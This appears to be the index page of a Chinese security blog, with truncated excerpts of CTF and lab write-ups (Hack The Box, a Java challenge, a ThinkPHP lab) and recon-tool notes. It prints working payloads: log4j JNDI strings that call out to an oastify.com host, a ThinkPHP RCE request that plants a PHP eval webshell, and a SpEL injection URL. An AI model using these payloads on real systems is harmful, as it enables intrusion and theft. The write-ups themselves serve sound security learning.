HTB
ps 我个人是在美国的服务器上架设代理,在vps上连接openvpn,然后使用proxifier来转发流量,liunx就用proxychains4,这样虽然比较快,但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv
拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务
Meow
nmap扫太慢了,拿fscan扫可以发现开启了23端口telnet服务,尝试登陆
1telnet 10.129.150.178
直接root登陆,未授权。
正常可以用msf来爆破
kali自带自带子在1/usr/share/wordlists/legion/
Fawn
FTP存在匿名登陆 匿名账号anonymous
使用msf的ftp login 模块设置好字典,账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt
爆破出来后可以用 ...
NSS上的一些java题
[HZNUCTF 2023 final]ezjava
打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...
春秋云镜
今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识,和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错,通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接
其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法(上)Linux提权之Sudo 70种提权方法(中)Linux提权之Sudo 7 ...
GraphQL
什么是GraphQL?
OAuth2.0认证解析与威胁
什么是OAuth2.0认证OAuth2.0其实就是第三方登陆的一种授权类型,其给授权流程定义了一个标准。
缓存劫持扫描器
爬虫模块。使用ktana来进行url的主动爬取,深度要可选择,默认就2吧使用gau来被动获取url将获取的所有url丢到下面的缓存检测模块进行检测,并标记上是否缓存进行分类。以方便下面的缓存逻辑检测模块
缓存检测模块对同一个url进行3次请求,当三次中出现了如下的响应头的规范就缓存命中
cdn出现如下响应头时其缓存命中123456789101112131415161718CDN提供商 缓存状态响应头字段 表示命中的值 响应头示例Cloudflare CF-Cache-Status HIT CF-Cache-Status: HITAWS CloudFront X-Cache Hit from cloudfront X-Cache: Hit from cloudfrontAkamai X-Cache, Server-Timing 包含HIT的值 X-Cache: TCP_HIT, Server-Timing: cdn-cache; desc=HITFastly X-Cache, X-Served-By HIT X-Cache: HIT, HIT, X-Served-By: cache-hk ...
信息收集工具编写
网上工具有很多.但是都没有串联,写个缝合怪模块域名收集subfinder
oneforall
合并去重subfinder和oneforall的域名存储到domain.txt
然后使用alterx来对域名进行变体探测
cat domain.txt | alterx | ksubdomain -verify -silent |tee res.txt合并去重 domain.txt与res.txt得到最终的domains.txt
端口扫描top100 默认使用naabu进行扫描top100
url处理naabu扫描完端口后使用httpx进行验证,并输出在项目的url文件夹下
主动爬取将获取的url使用ktana进行主动爬取,然后传给hakrawler,输出在url文件夹下
被动爬取使用gauxscan存在主动与被动,主动爬取的url传入xscan,输出其主动和gau被动爬取的值。所有扫描结束后将值
url去重主动爬取的url结果经过urldedupe处理 -s 处理
漏洞发现nuclei(内存占用也大,采用10000,10000行的形式会好很多)
xss扫描时使用脚本讲url分为10000行1 ...
强网
https://eci-2ze5i7cbu6fsrcnhkfnv.cloudeci1.ichunqiu.com:8080/check?rule=%23%7B%23systemProperties%5B'user.home'%5D=%22/tmp/%22%7D
chacklist
aa4d0537ff612e50e47a231e796e4a1f0515937c555566258a32aae013c98db13600992ddb8390b32a555b79c8c93980c101f3c72cd335852f8ada49a2e3a48344f1110546c53d55d7f2ce7a0f94b7c51de710e26ba42d3d808c41046c309c3d4e8496061ccc51225e2d696a76a6428af7b9214b7a6866bbb75e828f66cb8e590ea3890f7726117b6b795c418f385d2b82eed3dab27bc07b89080bbb4873be248add2177ce5d813fc29f40b4a46638d60242281a8d4b8f1ff2706bd7c6aeaa5721874292c2b1b4ce46762fd6832ae2d329253ea7346ec9af46c5ddc747085654577697a1eb3f22d7f1e426ea09cc4451d037804bb4232691f ...









